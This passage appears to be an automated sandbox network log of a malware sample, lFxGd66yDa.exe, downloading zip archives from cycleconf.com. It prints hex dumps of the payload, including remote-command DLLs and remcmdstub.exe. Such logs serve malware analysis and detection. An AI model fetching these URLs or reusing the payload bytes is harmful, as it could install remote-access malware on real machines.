2024-12-10 07:57:17 UTC	8000	IN	Data Raw: 84 2f 75 c5 40 7a 17 c6 81 8e 40 a2 1a d1 31 ce 8e 33 a6 1f 0e 5c e7 76 fe a1 9a 00 a0 6a 26 ca d8 28 73 45 19 17 65 9e 28 f3 42 19 1f 65 3e 28 1b 84 b2 21 28 23 51 16 80 32 09 64 46 b7 cd 9e 28 df 8a f3 9d 9e c8 bf b8 ed 85 5b f5 1a 94 55 42 e6 e8 0f 90 63 12 d5 d8 e4 99 21 75 55 a2 de b0 7c 97 36 77 9a d3 08 c6 79 4c 5b 89 51 50 0d 46 d7 72 02 6b a0 16 29 1c af 11 d4 38 ce ca 4b 87 02 e6 07 e5 1f 01 63 75 14 30 d9 e8 16 99 8a 94 78 72 ed bf d2 a7 97 94 47 d3 0d 9f ea 00 59 ae 50 dc ed 81 a4 43 2f 6d 17 a9 39 c0 41 45 d6 3d c3 62 41 f1 08 08 e6 0f 5e 9b 60 1c c7 23 3b 9c 1f a1 8d 1b 5b 74 31 d1 b8 ed 34 ac 7d 15 1f 9e 83 5c da e7 3c 38 4d 43 77 ad 06 40 b5 dc b1 04 57 cb 84 cc f2 d5 53 ac 81 36 0a 09 18 51 ad b2 1c 82 51 44 35 c6 f2 f3 d0 d1 58 7e 09 e7 Data Ascii: /u@z@13\vj&(sEe(Be>(!(#Q2dF([UBc!uU\|6wyL[QPFrk)8Kcu0xrGYPC/m9AE=bA^`#;[t14}\<8MCw@WS6QQD5X~
2024-12-10 07:57:17 UTC	8000	IN	Data Raw: 01 4c b1 b3 d8 5d ec 21 f6 12 bf 21 f6 13 93 e2 40 b1 5c 3c 5c 1c 25 1e 2d 8e 17 a7 89 37 88 bf 16 6f 13 9f 12 5f 13 df 11 3f 10 77 0e f4 08 f4 0e f4 0b 14 07 a6 04 1a 02 67 63 19 55 07 d2 83 7a 06 09 82 e2 82 be 08 3a 1b f4 5b 90 25 e8 71 50 6b 10 53 d2 5b 32 44 12 24 19 29 d1 48 a6 49 a6 4b 16 48 96 4b d6 80 9c 76 4b 0e 4a 2e 48 ee 48 1e 49 5c a4 7c a9 bf 54 24 95 4a 23 a5 89 d2 54 e9 34 e9 4c e9 5c e9 17 d2 a3 d2 ce c1 7e c1 c2 e0 e8 e0 b1 c1 59 c1 73 83 3f 0b fe 36 78 57 f0 b5 e0 b7 64 63 65 69 b2 1c d9 52 59 a5 6c 97 ec a1 ec a9 6c 90 5c 28 8f 92 8f 93 e7 cb ad 72 17 05 5f e1 ab 08 50 bc ab f8 40 b1 57 71 48 71 4b 31 39 64 6a c8 bc 90 f2 90 c5 21 d5 21 3d 42 47 86 c6 86 8e 0f cd 0e 9d 1f 8a 17 6b 82 84 18 ad 0b d9 8b f4 26 87 80 0c d4 e4 24 72 39 f9 Data Ascii: L]!!@\<\%-7o_?wgcUz:[%qPkS[2D$)HIKHKvKJ.HHI\\|T$J#T4L\~Ys?6xWdceiRYll\(r_P@WqHqK19dj!!=BGk&$r9
2024-12-10 07:57:17 UTC	8000	IN	Data Raw: 3c 6f 70 50 eb a5 3f 43 52 86 ae 03 13 8c e1 37 d5 44 e3 0f d4 c4 d2 67 c6 ea a9 06 eb 9c 66 2c 8d 9a b1 ac 69 56 8c 11 aa c1 73 ea 86 3c c3 ad 41 78 82 57 65 23 23 34 7c 61 14 fe 63 2d cd 6a fc 7b 35 ea ea 2f 6b d4 9b 6f 03 58 cc fc 4a fd 58 5d 51 39 c4 eb 94 65 72 a6 6e d6 29 2d 4e f0 3a 45 bf 0e e2 37 2c 23 23 9e c3 ff d8 0b 7f 46 df 18 a5 f1 ff fc 1a b9 cd b7 93 02 a8 f5 76 3a 08 b8 80 02 68 18 3c e0 02 0a a0 0b e0 01 17 50 00 5d 04 0f b8 80 02 e8 12 78 c0 05 14 40 0a 3c e0 02 0a 20 3a a8 ff b9 80 02 a8 06 1c e0 02 0a a0 66 f0 80 0b 28 80 5a c1 03 2e a0 00 1a 06 0f b8 80 02 e8 02 78 c0 05 14 40 17 c1 03 2e a0 00 ba 04 1e 70 01 05 90 02 0f b8 80 02 78 51 7c 10 70 01 c5 0b e4 1a f0 80 0b 28 80 9a c1 03 2e a0 00 6a 05 0f b8 80 02 68 18 3c e0 02 0a a0 0b Data Ascii: <opP?CR7Dgf,iVs<AxWe##4\|ac-j{5/koXJX]Q9ern)-N:E7,##Fv:h<P]x@< :f(Z.x@.pxQ\|p(.jh<
2024-12-10 07:57:17 UTC	1099	IN	Data Raw: ab e5 af 53 b3 cb a0 da 7d 8e 7f 12 1f 08 9d c6 71 6a e6 11 72 03 c9 0b c3 56 37 e0 9e db df d7 7f c1 fa ed 88 fb 47 55 57 cf 2f 07 3c 91 d5 76 f3 eb 83 42 8b 1a ea 1f 6b a8 07 ce ea 7f b0 45 11 7b ba 45 7d 97 5a 70 41 ae 0a 54 a7 a0 36 f9 fe d5 79 07 0e 2c 4a 18 2a 2d b3 be f3 89 52 77 bf ba d6 2b f0 d9 a6 45 a4 b0 35 33 1c c2 7a f4 51 11 27 52 1a 42 88 a1 0d d7 75 a4 06 d7 7e 5c 3b 54 7b c2 3e a3 6b 37 24 40 85 c3 0a b6 04 09 00 20 fb bf a2 00 63 b3 ad 31 a7 9d 05 fc cb a0 e6 68 ce 81 82 e4 24 0f 55 41 1d 09 24 2b 3a 80 1d c5 aa e0 d4 d1 86 68 48 19 ad 54 62 d7 82 d5 0d de d3 03 76 07 54 af 3c dd 4d 03 23 25 aa cb 41 41 20 a9 00 4c 26 fc e0 eb 9b 7f f1 f5 bf 42 dd 64 1d 09 a2 8c 24 43 14 38 6b 12 26 42 f8 71 ca 86 e6 27 fb 11 5e 62 0f be 31 98 b6 ac fa Data Ascii: S}qjrV7GUW/<vBkE{E}ZpAT6y,J*-Rw+E53zQ'RBu~\;T{>k7$@ c1h$UA$+:hHTbvT<M#%AA L&Bd$C8k&Bq'^b1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49708	23.254.224.41	443	5272	C:\Users\user\Desktop\lFxGd66yDa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 07:57:19 UTC	55	OUT	GET /dwnld/2nd2_2.zip HTTP/1.1 Host: cycleconf.com
2024-12-10 07:57:19 UTC	264	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 07:57:19 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 24 Jul 2024 21:12:30 GMT Accept-Ranges: bytes Content-Length: 1397545 Vary: Accept-Encoding Content-Type: application/zip
2024-12-10 07:57:19 UTC	7928	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 41 61 87 4f b9 dd 8c 32 53 1b 00 00 00 3a 00 00 0c 00 00 00 6d 73 63 70 78 6c 33 32 2e 64 4c 4c ed 3b 0b 58 5c d5 99 67 5e 64 88 43 66 62 c0 a0 92 04 75 62 a9 10 76 1e bc 87 61 20 30 84 28 24 43 20 90 17 20 81 81 01 79 4c 66 ee e4 e1 86 04 be 61 12 26 37 93 d2 55 d7 b4 8d ad 36 da c6 36 ad ba 5f aa 44 ad 0e 21 02 d1 24 c6 c7 46 6b 6c 9b 6a ea 37 2c ac a2 9b 8d 24 a6 b9 fb ff e7 de 19 06 88 d6 76 b7 5f 77 bf f5 f0 9d 7b ce f9 cf 7f fe d7 f9 cf 39 ff b9 73 29 59 d7 4b 24 84 10 29 64 8e 23 a4 8f f0 29 97 fc f9 74 1e f2 9c 45 cf cf 21 47 22 4f dd d6 27 2a 3e 75 5b b9 ad c9 19 6f 77 b4 37 3a 6a 5b e3 eb 6a db da da 99 f8 8d d6 78 87 ab 2d be a9 2d be 60 65 59 7c 6b 7b bd 35 39 2a 6a b6 5a a0 91 7a 7a e3 5b 9b 9e 52 74 06 b3 f5 b8 Data Ascii: PKAaO2S:mscpxl32.dLL;X\g^dCfbubva 0($C yLfa&7U66_D!$Fklj7,$v_w{9s)YK$)d#)tE!G"O'>u[ow7:j[jx--`eY\|k{59jZzz[Rt
2024-12-10 07:57:19 UTC	8000	IN	Data Raw: fa 7a 84 e1 99 f2 cb 4b f5 42 68 b7 89 d9 45 56 2e 3a 5d 4a 56 5b 77 76 66 75 d5 2e a3 b0 2f f6 97 94 bf 7f 72 fe 87 b4 fc 16 e6 30 b1 4a d1 c9 4a 45 97 db a9 64 b5 73 38 26 a1 57 fe 81 c9 f9 73 b5 fc 56 e6 b0 b0 4a 93 13 6a e2 82 aa b8 b1 2e 27 39 0c 4b 42 5d fa d4 c7 92 0c af 6d c9 65 ea 73 fa 32 f5 19 9a 9c 7f cd 92 5e fd 71 26 65 7f 40 bc 54 22 aa c1 2a b0 40 a6 5f f0 c8 d7 fe 2c 4b f0 0b 6c bf 9c fe 9b 2c 21 5a 2a e2 00 54 37 5f be fe a1 e4 f2 2d 6a f9 0e 91 a5 33 8b 5f 70 f9 07 b0 fd ca a1 a4 1a 50 f9 bc 71 25 a2 db 57 04 10 a0 81 32 54 b4 6a 97 08 a9 42 ad 0a fd 6a 7f f0 9e 54 01 c8 6f de 6a b7 98 b7 54 9a d8 14 ea 71 b7 4f 8f 40 a0 b9 9d 04 c5 24 a4 4a bf b5 d2 d4 74 da 32 60 17 95 6c b7 42 e9 26 1f ce 55 b7 53 cb 67 11 e2 e9 ad 90 de c2 a6 f0 2c Data Ascii: zKBhEV.:]JV[wvfu./r0JJEds8&WsVJj.'9KB]mes2^q&e@T"@_,Kl,!ZT7_-j3_pPq%W2TjBjTojTqO@$Jt2`lB&USg,
2024-12-10 07:57:19 UTC	8000	IN	Data Raw: 48 db 46 56 77 1e 60 9e bb 00 38 85 1a 20 54 a7 85 9e 83 d0 8e a9 a1 5a ab 10 bc 8d 55 9a 22 8e 56 97 5f e7 1e 88 e6 13 5e 24 96 59 dd 90 60 99 a3 8d 98 82 5a 39 7c 3e 98 81 6f 00 35 54 bb 4f 08 c0 fc 36 41 8b 80 d0 23 9b de 73 81 cc a3 8a 25 3c 90 d1 6d 5e 35 08 ba b0 7a 56 0d 76 96 45 58 13 75 09 99 7b 5c da de aa fa a7 8b ff d3 c5 df ae f8 17 4b d2 7b d3 95 87 24 27 de b7 2f e9 3c 5b 27 9e 67 fb 77 ad 29 76 9e ad 7e 55 ca f3 6c aa fd e0 2f 1f b3 c4 52 3e b0 2a 65 ca 84 f1 9f 94 20 9f 79 51 20 47 dd 2d aa 69 a6 8c f6 eb 9d 3e 63 7f 20 c0 dd fd a0 02 1f 2f 4d 03 0e 11 fb 98 f4 06 10 eb f6 75 f6 d3 62 db 30 76 35 6e ee 31 4f ae 5f ef 62 f7 8d f6 9d 8e c5 fe 7e 69 9a 66 6b 1b 83 7c 24 16 bb 96 20 8f 4a 82 dc 1a 8b 5d 40 90 47 26 41 de 1e 8b 9d 49 b1 a8 6d Data Ascii: HFVw`8 TZU"V_^$Y`Z9\|>o5TO6A#s%<m^5zVvEXu{\K{$'/<['gw)v~Ul/R>*e yQ G-i>c /Mub0v5n1O_b~ifk\|$ J]@G&AIm
2024-12-10 07:57:19 UTC	8000	IN	Data Raw: 61 c3 58 3a 73 98 5c f9 ed c0 f3 ec 97 87 7e 89 e7 f1 49 09 e1 00 29 40 0b 56 2e 6a c1 c8 3e 27 50 2f a9 48 a3 5e 57 01 54 da 67 35 7c 0c 24 5b 09 cc 42 82 13 a3 57 9f a6 a2 57 62 02 bd 12 91 5e 55 38 e5 cf 5d 57 a0 56 62 32 b5 12 fb da 2b cc 7e ee ca f6 0a fe 6c b9 f9 0e e8 ee 2e 9c 09 c1 98 bd c2 f9 80 19 6a be e7 76 10 ca d2 f7 a5 93 a6 fa 7c 7c 0f d1 75 a7 85 ba a3 1d cf 13 96 8a 52 b9 49 c9 72 e2 d8 d5 e2 a9 2a 68 eb 10 0d 51 95 ac 19 10 2e 95 5a a5 0c 7f ae 7c ff 1d aa 5d 84 a8 ce 67 7e cb b8 87 b5 ca 83 ee e4 b7 8c a3 a9 8d cf b2 1a 04 85 56 ad b4 3f dc 1e bb 49 1c b9 ea 87 6f 4f 7d 99 b2 66 8f f3 09 db e5 4d 56 0d b5 a4 0b 91 45 ba 95 22 6e 14 5c c8 8f 92 59 ea fb 5f f1 d5 27 6e 37 84 39 d3 51 35 5b df 08 53 b4 02 48 bb ef 08 12 a0 7d 38 45 df e8 Data Ascii: aX:s\~I)@V.j>'P/H^WTg5\|$[BWWb^U8]WVb2+~l.jv\|\|uRIr*hQ.Z\|]g~V?IoO}fMVE"n\Y_'n79Q5[SH}8E
2024-12-10 07:57:19 UTC	8000	IN	Data Raw: cf 91 e7 0c 35 5b 22 a5 83 2b 9c f2 8b 57 f3 25 37 d3 3f d8 87 56 f5 f2 5f ee 25 aa c7 ba 34 13 8f 72 93 f9 8d 72 23 10 a9 a5 b5 16 c1 1c 26 b7 74 d3 03 80 61 d5 e6 ad 00 ce 56 62 09 ce 08 35 0e 66 47 43 dd c6 79 43 99 c2 ae b2 0d 0f 4e 08 c9 c0 cb 18 43 bb 8c 10 3a bf 13 57 5c 3c da b2 72 f8 3d 57 05 6f 0a 75 eb cc cb d1 40 6c e5 fd ba 7b 1e d0 05 b3 f0 ea c9 e5 87 31 a0 44 7f cf 04 bd b9 3e 8a 4b 1b 76 bf f9 33 40 f6 c9 01 dc 1c 34 da 9a 51 06 b8 f3 66 8d f5 63 83 a4 a7 d1 74 89 79 8c d2 33 b8 a7 c4 a0 6b 56 94 e1 43 b9 49 7a 1a 0d e6 66 33 8f 65 b6 f4 8c 13 1e 1b 5e ea 47 4a 14 8f 85 8c 54 a4 17 f2 10 3b 5e c8 a5 6f 0b 5d 5a 6d 45 9e 80 6c 55 6e 37 6f c9 9c ad 5b 87 49 cc 5b 66 a0 9d ca ba 5c 8c a4 24 68 b0 f2 00 19 ac 34 2f 3e c6 28 2f b7 59 19 ce 22 Data Ascii: 5["+W%7?V_%4rr#&taVb5fGCyCNC:W\<r=Wou@l{1D>Kv3@4Qfcty3kVCIzf3e^GJT;^o]ZmElUn7o[I[f\$h4/>(/Y"
2024-12-10 07:57:20 UTC	8000	IN	Data Raw: 19 0b 24 8f 93 3a 5b 94 48 5d b4 8b 48 5d 99 71 ec e2 3b 4c e6 b5 b0 f8 b7 6b 84 4e 95 9e 20 0e 3d e3 19 f6 cb 7f 3a 0c 3c 2d 9d bb fc 0e ce 8b aa 33 e4 1e e1 24 9e ea b5 7d 10 28 f2 e2 3d 87 87 5a 68 3b d8 16 5d a0 71 b3 b0 5c fc c8 f8 c5 07 57 e3 f6 c7 17 c7 e4 e3 90 e0 86 2f 03 fd 59 06 59 93 1d 50 0e 51 dd 90 94 cc b8 a3 18 d7 17 68 41 45 43 e5 69 56 75 9a 55 9e 64 f7 54 18 5a 9c ae 16 fb 3e 58 c8 f7 a1 8a c9 c5 de 65 de 1c 74 a4 a6 1c 5a 5a bb 4f 08 64 44 ed b2 91 fb f1 d7 69 64 89 55 ca 30 d5 0f f1 a9 be 2b 69 aa af 3b 4a 53 1d b7 f9 e4 fe 7f 51 a7 fa 7e f9 c5 4f f9 ed af d0 83 05 df 6c aa e3 06 89 a3 13 35 b1 df 88 5c bd 96 41 e4 aa f3 ec 2c 45 dd eb cb f9 7b 12 c7 ab d9 0f b2 4f 6c 5f a8 b2 cd 00 96 ee 94 ff 7c 8c e6 4d 9f 2b 42 43 4b ac 96 f9 99 Data Ascii: $:[H]H]q;LkN =:<-3$}(=Zh;]q\W/YYPQhAECiVuUdTZ>XetZZOdDidU0+i;JSQ~Ol5\A,E{Ol_\|M+BCK
2024-12-10 07:57:20 UTC	8000	IN	Data Raw: 6e d7 23 bd f4 5d 9e 5e 0e f3 a1 f2 d5 37 fa 46 6d 56 e4 96 6b 53 1e af 37 63 74 6f 3a 12 1f 64 23 7d 06 4b e2 f4 17 85 54 f0 36 25 c3 6b 73 c4 48 88 c3 a4 92 60 4b 2f 12 94 94 7f 67 72 fe 35 8e de 24 c8 d2 87 04 25 e5 df 95 9c df e9 e8 43 02 af 4e 51 7e a8 73 64 1c 44 34 19 c4 c0 04 10 96 48 65 bb 5b b2 9f c6 3b 04 25 47 27 d4 c9 77 5b 42 85 38 53 9d 54 9f 7d c9 c0 1a a7 25 92 74 56 6c 75 fa ae ee dd a2 a4 fc 47 92 f3 2f 9d d6 ab 3f 46 f4 ed 8f 78 e6 63 c9 99 27 4e 4b 5a d2 8c 96 d4 4b 5a 52 f9 ef 25 83 10 7a 97 7f fb d7 8c c7 a9 5e ed 9f da 7b 49 fb 9a fc a7 7b b5 bf 77 fe f4 af c9 ff 8f e4 fc c5 3c bf 79 6b 02 42 98 7a 21 44 3c f3 d9 e4 cc 86 a9 49 fd 77 e7 37 e9 bf ce 5e ed bf af 0f 3e 0e 4c 89 8f d9 6c 0a 7a 23 d0 2e c2 95 ec e7 f8 dd 21 74 e1 ab 0c Data Ascii: n#]^7FmVkS7cto:d#}KT6%ksH`K/gr5$%CNQ~sdD4He[;%G'w[B8ST}%tVluG/?Fxc'NKZKZR%z^{I{w<ykBz!D<Iw7^>Llz#.!t
2024-12-10 07:57:20 UTC	8000	IN	Data Raw: 41 13 72 47 1d 0f f9 00 94 c0 5d 50 eb 69 bc a3 90 27 8a 38 9e 69 32 4a 35 43 a9 55 4d ed 0e 79 1b ee 1f f6 3d 87 83 68 1d db e7 0e f7 c2 dc 64 2a f7 cb 35 63 7b da 2b f5 36 56 12 66 4a d6 de e6 90 07 fc 01 f6 59 81 56 b8 cc 4e ea af d5 63 13 d4 5f 68 bb 07 5b ae 14 ed 9d 39 55 e4 7c a9 29 41 5f e6 94 74 4b 31 2a b7 3e b1 9c 93 95 c4 2f 84 da 3c 5e ad 05 ab 26 3b 37 9b 64 d4 97 45 e5 36 27 96 cb 62 25 59 b8 73 c4 f0 26 5a 4b 42 9d 3d e6 b3 01 22 87 40 d4 27 82 c8 61 0f e4 00 ca 59 c9 1a 3b a1 d1 45 68 f8 7d 49 78 b9 04 6f 6f 22 bc 5c 56 92 0b 28 e5 51 9c 4a 11 8b 95 55 08 07 1e cc 6f f5 e8 da e2 2c 1d 76 96 94 04 6f 14 c1 3b 9e 08 6f 14 2b 19 f5 7f 0c 6f 34 c1 eb 48 84 37 9a 95 8c 06 78 df 14 1e 5b 00 4e 0e c6 a2 b9 34 e4 5c 1d 72 3c 6c 0f eb 7f f2 d5 db Data Ascii: ArG]Pi'8i2J5CUMy=hd5c{+6VfJYVNc_h[9U\|)A_tK1>/<^&;7dE6'b%Ys&ZKB="@'aY;Eh}Ixoo"\V(QJUo,vo;o+o4H7x[N4\r<l
2024-12-10 07:57:20 UTC	8000	IN	Data Raw: 85 28 8d 07 98 0b d3 07 48 68 0d 32 1e bf e5 ad f8 72 22 bd b4 47 96 8f 34 87 47 41 a9 7c d7 89 84 b0 9b 18 8d dd d5 96 ef e2 f9 ae 4e 8b ab 4b 4f 6b 83 a6 40 9f 8d c3 ee a8 58 cf 86 8d 87 1f 41 ab 17 7d 04 e1 d9 a4 5a 76 dc a3 56 ac c7 46 38 ec d8 88 f5 01 8c 97 52 b9 c6 a7 bb 9e ab 58 8b a3 e5 4d 0a a0 89 e1 17 cd 57 f4 0e bf a8 cf 7f b2 a0 24 97 e1 16 fc a4 b8 c0 01 a5 ac 4b 84 05 66 9d 91 8b 5a e8 1b 01 fe c6 c0 81 c2 2e 2e 7c 2d 9e 24 a0 b9 76 70 8c 7c ab 0d 1d 43 1f 86 66 fa 45 d4 60 34 09 10 fc c7 a7 5f 8d 8c 74 59 c2 b3 e5 b9 13 0d 8d 31 6b 8d 1e 0b 7f 3d 01 46 51 4f 18 b3 e2 40 e4 d2 89 14 88 43 57 9e 7d 10 20 cd 19 cc 28 78 78 cb 27 d4 cc 14 59 b5 fe 14 fa f6 0c 04 ef d0 b2 b7 e3 cf 56 78 d9 70 0a 5f aa 65 a7 3c 01 0c a0 b4 1b 1e 21 75 ef a9 9c Data Ascii: (Hh2r"G4GA\|NKOk@XA}ZvVF8RXMW$KfZ..\|-$vp\|CfE`4_tY1k=FQO@CW} (xx'YVxp_e<!u
2024-12-10 07:57:20 UTC	8000	IN	Data Raw: d2 44 21 a5 bc cb ee b6 a9 d1 35 a4 48 d8 49 cb c6 3b 98 48 ea 83 fc 28 c9 c0 2a 0a 7e f9 54 1c a0 05 53 dd 9e 84 65 c6 ab bd a3 2f 33 6c b2 cc 6a b6 09 3e 1c fd 03 89 dd 5b a9 c6 4d 99 84 cd 9f b7 a4 49 ea ba 8d d8 30 79 83 48 da 08 49 2c ba 05 5b 9c 94 57 21 41 9c 4f 82 d7 41 89 07 6d c4 5b d1 d5 bd 1f e7 de c3 7d 2d cb 5f 53 0d b3 2c 54 b7 09 ac 70 4d ee 3b f7 99 d5 22 f7 64 c8 4d 76 35 ee 2f 28 b0 47 2f 70 37 ae fa 2f 1a fd 44 05 70 37 22 bf 28 1a f4 e3 e7 a1 41 99 b0 09 81 e9 ba 5f 6b d1 61 f5 30 3b 7a 68 b5 81 aa 10 ba 3d 20 72 04 1d 5a 76 2e 76 a2 8a 22 3c db d1 8a 5d be 97 45 8f 92 9e e6 38 3d 29 ea 12 7c 47 65 f2 cf 22 6c 25 ba 94 de d7 c0 27 d4 e3 4a ae 67 90 5e 4f 54 14 c3 ac 6c 1d 66 0d 0e 76 43 cb 03 1e 6f 50 d2 c7 ae dd 1b 79 b8 af 3b 4c 87 Data Ascii: D!5HI;H(*~TSe/3lj>[MI0yHI,[W!AOAm[}-_S,TpM;"dMv5/(G/p7/Dp7"(A_ka0;zh= rZv.v"<]E8=)\|Ge"l%'Jg^OTlfvCoPy;L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49710	23.254.224.41	443	5272	C:\Users\user\Desktop\lFxGd66yDa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 07:57:24 UTC	55	OUT	GET /dwnld/2nd2_3.zip HTTP/1.1 Host: cycleconf.com
2024-12-10 07:57:24 UTC	262	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 07:57:24 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 24 Jul 2024 21:13:01 GMT Accept-Ranges: bytes Content-Length: 64489 Vary: Accept-Encoding Content-Type: application/zip
2024-12-10 07:57:24 UTC	7930	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 65 1f 9b 48 27 d4 1e 84 38 1f 00 00 78 49 00 00 0b 00 00 00 50 43 49 43 48 45 4b 2e 44 4c 4c ec 39 79 5c 53 c7 d6 73 93 80 61 11 52 d9 dc d0 40 a5 8a 28 dc 9b 0b 28 0a ca 16 95 16 34 25 08 2e a8 84 e4 02 91 6c bd 37 41 b0 5a 65 71 a1 11 b5 75 f7 f5 ab 58 a5 b5 4a 6b 17 17 5a 6b c5 a5 fa 6c b5 7d da be aa 75 6f ad e2 d2 aa cf d6 a5 5a f3 ce 4c 02 82 5b db 3f de ef fb 7d ef 73 70 e6 cc 59 e7 cc 99 99 33 73 63 c6 98 f9 48 8c 10 92 40 75 38 10 6a 40 ce 92 88 fe b8 9c 82 ea d3 fd 63 1f b4 c1 63 7f 48 03 95 be 3f 24 ab 48 2f c8 2d bc b9 90 d7 18 e5 5a 8d c9 64 b6 ca f3 39 39 6f 33 c9 f5 26 79 ea 08 b5 dc 68 d6 71 91 ed db 7b f6 70 d9 10 4a 3c b7 f4 0b d2 35 35 d7 3e 2f df 6c 8a 21 f0 cb a6 68 80 83 cc 37 9a 68 c2 e3 9a 7c 09 fd f3 Data Ascii: PKeH'8xIPCICHEK.DLL9y\SsaR@((4%.l7AZequXJkZkl}uoZL[?}spY3scH@u8j@ccH?$H/-Zd99o3&yhq{pJ<55>/l!h7h\|
2024-12-10 07:57:24 UTC	8000	IN	Data Raw: 51 ae fd ac 2a b8 c5 c6 da 66 87 5f ae a4 fc 63 5d ab 0f e4 ac 90 86 0e 13 7b 44 0c ec 1a 08 0e 08 ab 57 06 6b 13 e4 b8 55 2f f7 1a f8 fb d1 e5 07 a4 dc e5 0a b0 6b e3 13 a4 e8 ed 7e ef 3f de b0 0a b5 28 e1 83 67 b4 c5 fb 5e 38 3a 74 05 8a 3c 97 3f 74 30 44 20 8a 71 e5 fa 90 46 93 d0 d3 07 8c e9 3f f0 f8 0f 50 4b 03 04 14 00 00 00 08 00 24 a0 cd 56 00 ef 64 fe d7 7f 00 00 58 f7 00 00 0e 00 00 00 72 65 6d 63 6d 64 73 74 75 62 2e 65 78 65 ed fd 0b 40 54 55 d7 30 8e 9f b9 00 03 0c ce a8 a0 a8 a8 a3 e2 2d bc 0c 0c f7 19 60 50 06 31 41 47 91 41 54 54 12 10 08 81 e0 0c 6a 79 01 07 8c e1 38 69 a5 d5 d3 e5 49 53 cb d2 ca 32 2f 95 1a 88 81 a6 95 77 2d ad b0 4c 0f 8d 25 a6 29 2a 72 fe 6b ed 73 06 06 b5 9e e7 7d be ff fb 7d ef f7 fd 1a dd 67 df d6 de 7b ed b5 d7 5e Data Ascii: Qf_c]{DWkU/k~?(g^8:t<?t0D qF?PK$VdXremcmdstub.exe@TU0-`P1AGATTjy8iIS2/w-L%)rks}}g{^
2024-12-10 07:57:24 UTC	8000	IN	Data Raw: e4 cb 92 ef 11 f2 dd 43 be b8 b8 61 f7 7f 03 9f 89 37 d0 bf 06 fc 20 c1 03 d8 98 1b ed 12 fc c7 eb 20 c1 f7 6e 43 bd 56 da 83 a9 c4 f3 42 ec e4 96 83 5c 53 98 27 45 dd 8c 97 eb cd b3 4c 6c 01 9e 1c 7d b2 ee 1c bf aa ec 63 69 69 a3 7b a0 2a 6b 7f a6 b9 b6 cd a5 f6 82 ab 44 be 03 bb 17 6a a1 dc 8c f5 5f 66 7e 05 e1 7a 21 9c 37 c0 35 f6 87 ee 50 db e8 2a 91 da 04 a8 fd 37 f5 fe 65 8a ca 27 c8 91 98 f6 1b 45 c5 3c 70 55 77 17 56 71 36 b2 8a b3 ed 86 6f d5 da ab f0 ad 38 ae a8 78 06 04 f8 58 cd 4d eb 6b b8 5a 8b d8 81 80 8a 95 8b 20 d0 36 a6 51 37 6d 81 42 b1 6f bf 62 5f 99 2f 8c 78 96 46 05 72 8a 62 5f 45 6d 38 78 f3 dc 6a 5b a4 69 d6 ca 95 90 42 5b ab 78 5a 05 69 38 ff ca a7 c7 03 a4 0d c9 06 b4 ad 22 14 26 74 db 41 e8 b9 83 50 72 07 a1 f0 0e a4 64 53 93 3b Data Ascii: Ca7 nCVB\S'ELl}cii{kDj_f~z!75P7e'E<pUwVq6o8xXMkZ 6Q7mBob_/xFrb_Em8xj[iB[xZi8"&tAPrdS;
2024-12-10 07:57:24 UTC	8000	IN	Data Raw: 75 39 e7 0b 1d 92 6c 43 a3 5d 4f b5 8f 35 1b 2e 82 6f 03 8b 9f 2b f8 69 b6 3b 5f 3a 62 bc 12 3f d0 53 a6 08 a3 14 66 de d7 1e bf 29 97 98 65 96 1a b9 b6 be f8 ca e3 87 e4 92 24 d9 2c 6d 6d 89 0b 46 8b b1 51 b9 90 2b 76 c7 dd 74 d4 45 61 11 57 bf 6f da a7 01 67 c9 ba c6 73 d9 04 da 87 a9 cb 13 a7 05 d4 d2 03 c1 c8 c0 80 db 3c 96 9d b2 07 95 1a 00 10 f5 70 71 f8 c2 a5 f8 3e 44 71 3d 7e ec 29 dc 82 99 cc 09 fe 65 40 5b 91 8c 71 b5 4f 66 ea 2c ac 82 0e b2 b0 ae f4 80 04 ba 1b 6b aa 6d 1f 37 6f d7 c0 88 fb f1 3e c4 69 3d 7e ec 3d f6 61 45 d7 e3 c7 ee b1 0f ab ba 1e 3f 0d 86 8b fc 26 37 41 dc 6a 68 d4 d4 58 96 34 8a 14 15 a7 c9 e1 6a a3 d9 2d 4f c2 de 42 3d 17 c3 45 5c a2 8e b7 43 f1 f8 e2 52 ab e5 ae 8c f6 80 1a c1 dc e8 ae d4 dc 87 99 34 c7 9a 74 d2 3a 6e 0e Data Ascii: u9lC]O5.o+i;_:b?Sf)e$,mmFQ+vtEaWogs<pq>Dq=~)e@[qOf,km7o>i=~=aE?&7AjhX4j-OB=E\CR4t:n
2024-12-10 07:57:24 UTC	8000	IN	Data Raw: 35 31 17 17 03 6e 3c 5d c6 67 52 d4 09 69 4a 41 0e 01 c9 34 2c 9c 9b 55 84 b5 06 86 c2 ec a8 4d d8 9e 7f 1e 0d f5 88 cb 7a cc 3c 6f 5e 56 b1 11 98 1e ab 5c 23 9d 9a 55 3c 3f b7 a0 83 5d 40 a0 38 95 eb 08 ec ea 92 9a 9b 99 35 36 27 a3 78 6a 21 61 bf 31 8b e8 2c 6a a4 24 71 6c 52 46 11 df fe 80 f1 3c 49 7b dc d4 42 47 02 ea 37 a0 16 94 3f 16 58 3f 77 6e 46 7e b2 43 25 22 42 92 98 95 51 9a f5 40 b8 14 f0 14 ca 2d 2c 8e cf c2 b3 db 2c 07 be bd 44 ce 07 94 de 0f f6 41 c0 22 83 f4 f4 07 f9 33 95 fa 16 6b f6 b0 08 aa 10 29 c7 53 7e 6c a1 19 79 e1 27 e0 11 40 0c da fd c9 fb 51 8c 2d c8 4c 2e ca 2d e0 01 af 63 9e 58 fa d4 45 45 59 d4 5c be b7 64 14 d3 e6 22 64 c1 54 ea 18 b4 79 7e 16 fd 40 35 bf 24 dc cb f7 54 8a 7a 4b 32 d9 9c 55 bc c8 98 55 4c 58 b9 60 2e 8f 06 Data Ascii: 51n<]gRiJA4,UMz<o^V\#U<?]@856'xj!a1,j$qlRF<I{BG7?X?wnF~C%"BQ@-,,DA"3k)S~ly'@Q-L.-cXEEY\d"dTy~@5$TzK2UULX`.
